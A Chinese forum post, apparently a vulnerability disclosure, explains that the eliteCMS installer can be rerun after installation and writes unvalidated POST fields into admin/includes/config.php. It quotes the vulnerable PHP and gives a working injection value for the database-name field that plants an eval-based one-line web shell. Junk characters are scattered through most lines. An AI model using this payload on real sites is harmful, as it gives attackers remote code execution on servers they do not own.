eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装& v) p% J' o; a/ \6 L3 f
# |! J, d2 k5 ~& j& P4 O' V" \
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php$ M9 Q. @7 h3 B' |. `) V2 G' m/ z
我们来看代码:: R& {' Z( S: y; ]1 C) a
( g1 s" t0 `# e+ g6 \- M5 k* w
...
5 W1 p* s- ^2 a2 x8 | \elseif ($_GET['step'] == "4") {; y) ~8 W" Y5 E) K. W* q
$file = "../admin/includes/config.php";
5 i+ Y. \8 X( c; H( F4 z; f D $write = "<?php\n";
& h# q( B, v* y( u1 n $write .= "/**\n";
* c5 k8 K/ Y) ?, c4 F $write .= "*\n";
6 \/ \& v+ D. Y5 J# ^' `" r $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
. i' g1 ]+ \. X...略...4 B. A2 T- q4 w3 f2 T0 a) A
$write .= "*\n";
7 Z3 p% C: n" a$ e5 I' T $write .= "*/\n";. |& p" c K; x4 i/ A7 a
$write .= "\n";3 b5 f, m3 Q! ?1 D9 E
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
9 v, P5 `( G. b! t $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";: w6 u2 h8 i1 S
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
7 `2 U0 M7 x8 v+ q$ M/ ]' } $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
1 s. b- ^7 \: I& k( b $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";1 q+ K: `+ Q T" m' m! d, w
$write .= "if (!\$connection) {\n";2 g# S1 ?) d) K
$write .= " die(\"Database connection failed\" .mysql_error());\n";
, |$ ]; v# d8 D* E $write .= " \n";
* F) T$ u i& c $write .= "} \n";
) o" Q4 c' b0 U3 E2 j- f$ G u $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
3 W/ y; A1 `% H5 j3 u& j $write .= "if (!\$db_select) {\n";+ `# I1 Q. J' e+ l, D6 U
$write .= " die(\"Database select failed\" .mysql_error());\n";- P7 A5 i$ `5 D5 h2 |, M
$write .= " \n";
" f' h0 x& l! {9 W $write .= "} \n";' ]1 W) ]" i( x# k9 P- f. f
$write .= "?>\n";" I! k E* n# @4 D; c/ L
- U! r, ?7 a4 z. i i* B: k" v+ P
$writer = fopen($file, 'w');
1 Z( \5 R' E* V8 G& G...2 e+ ^9 w8 d4 i& D5 v$ M
2 b$ t0 D+ B" f7 ?/ H3 w0 K
在看代码:
5 i$ u7 |0 Y/ p 5 p( k: a* f2 f% k
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
3 g7 J; s$ f' f0 z( Q$_SESSION['DB_NAME'] = $_POST['DB_NAME'];2 t/ V5 {2 j M% B8 [
$_SESSION['DB_USER'] = $_POST['DB_USER'];+ v0 @4 z- }, h' |* l7 n
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
, Z8 R7 R0 F2 w, q ` B$ z6 H S+ S; C( C1 U
取值未作任何验证
, E$ _1 \3 L5 y' b2 z如果将数据库名POST数据:
3 g* \6 y8 B7 }5 C: t5 E4 @ 2 ]5 }- R$ S N3 N' `
"?><?php eval($_POST[c]);?><?php
* A2 ~( C9 W9 t; ~8 S: J& \* a
, j- l7 m/ w) q将导致一句话后门写入/admin/includes/config.php: ^& i0 Y/ h3 p0 p& p$ a5 x7 [7 e
|
发表于 2012-11-18 13:59:27
收藏
支持
反对